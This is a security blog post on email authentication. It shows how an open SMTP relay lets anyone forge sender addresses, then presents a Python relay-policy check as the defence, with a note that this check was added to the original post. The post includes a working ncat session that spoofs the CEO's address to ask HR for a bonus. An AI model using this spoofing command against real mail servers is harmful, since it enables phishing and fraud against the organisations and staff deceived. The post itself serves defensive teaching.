Inbox (1): Proper Email Authentication

By ivision November 19, 2021

Emails are sent from a source server to a destination server (sometimes through multiple hops) via the SMTP protocol. When you use a webmail client – think Gmail and Yahoo – to send an email, the web server sends emails to its bundled SMTP server and handles authentication for you. When you send an email through a desktop client, like Outlook, Thunderbird, or some mobile clients, the client connects directly to the configured SMTP server, authenticates and sends the email.

However, email is an old and arcane system designed for a less hostile world. SMTP servers are often configured to accept unauthenticated connections for sending mail, which lets an attacker spoof sender addresses for phishing or spamming. In some intranet configurations, such spoofed emails appear entirely authentic, with no telling sign that they were not sent by the legitimate account owner.

If there is an open SMTP relay on your company network, here is a quick way to make some money (and then go to jail).

ncat -t -C smtp.example.com 25 <<EOF
helo example.com
mail from:<mr.ceo@example.com>
rcpt to:<hrdepartment@example.com>
data
From: "Mr. CEO" <mr.ceo@example.com>
To: "HR" <hrdepartment@example.com>
Date: Wed, 01 Apr 2021 12:01:01 -0500
Subject: Give John Smith a bonus

He deserves a $10k bonus.

Regards,
Mr. CEO
.
quit
EOF

The preceding command would cause an email to be delivered to the HR department, pretending to come from the CEO and asking for John Smith to get a bonus. It works because the relay accepts mail without authentication; 'ncat' is a modern netcat utility, '-t' answers telnet negotiations for compatibility, and '-C' converts line endings to CRLF (which some SMTP servers require). Note the blank line after the Subject header: it separates the message headers from the body, and the lone '.' terminates the DATA section.

The best way to close an SMTP relay and prevent everyone from getting 10k is to require authentication, and then to ensure that permissions do not allow an authenticated user to send email as somebody else without proper authorization: each login should only be able to use the sender addresses it owns.
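As an added illustration of that policy (this is not code from the original post; the login-to-sender mapping is a constructed example), here is the decision an SMTP server should make for each RCPT TO, in Python: unauthenticated clients may only deliver inbound mail to local domains and may not claim a local sender, while authenticated clients may relay anywhere but only from the addresses mapped to their login.

```python
import re

# Domains this server accepts mail for (constructed sample).
LOCAL_DOMAINS = {"example.com"}

# Which authenticated login may use which envelope sender (constructed sample).
SENDER_LOGIN_MAP = {
    "mr.ceo": {"mr.ceo@example.com"},
    "hr-bot": {"hrdepartment@example.com", "noreply@example.com"},
}

_ADDR = re.compile(r"<([^<>@\s]+@[^<>@\s]+)>")


def parse_envelope(cmd):
    """Extract the address from 'MAIL FROM:<a@b>' or 'RCPT TO:<a@b>'.
    Returns '' for the null reverse-path '<>' (bounces), None if unparseable."""
    if re.search(r"<\s*>", cmd):
        return ""
    m = _ADDR.search(cmd)
    return m.group(1).lower() if m else None


def relay_decision(mail_from, rcpt_to, auth_user=None):
    """Return (smtp_code, reason) for one RCPT TO command.
    auth_user is the SASL-authenticated login, or None when the client
    did not authenticate (as in the ncat session above)."""
    sender = parse_envelope(mail_from)
    rcpt = parse_envelope(rcpt_to)
    if sender is None or not rcpt:
        return 501, "syntax error in envelope address"
    rcpt_domain = rcpt.rsplit("@", 1)[1]
    if auth_user is None:
        # Unauthenticated: inbound delivery to our own domains only ...
        if rcpt_domain not in LOCAL_DOMAINS:
            return 554, "relay access denied"
        # ... and a local sender address requires a login (blocks the CEO spoof).
        # Trade-off: externally forwarded mail from local senders also needs
        # an exception (SPF/DKIM evaluation), which is outside this snippet.
        if sender and sender.rsplit("@", 1)[1] in LOCAL_DOMAINS:
            return 553, "sender address requires authentication"
        return 250, "ok"
    # Authenticated: may relay anywhere, but only as an owned sender address.
    if sender not in SENDER_LOGIN_MAP.get(auth_user, set()):
        return 553, "sender address not owned by authenticated user"
    return 250, "ok"
```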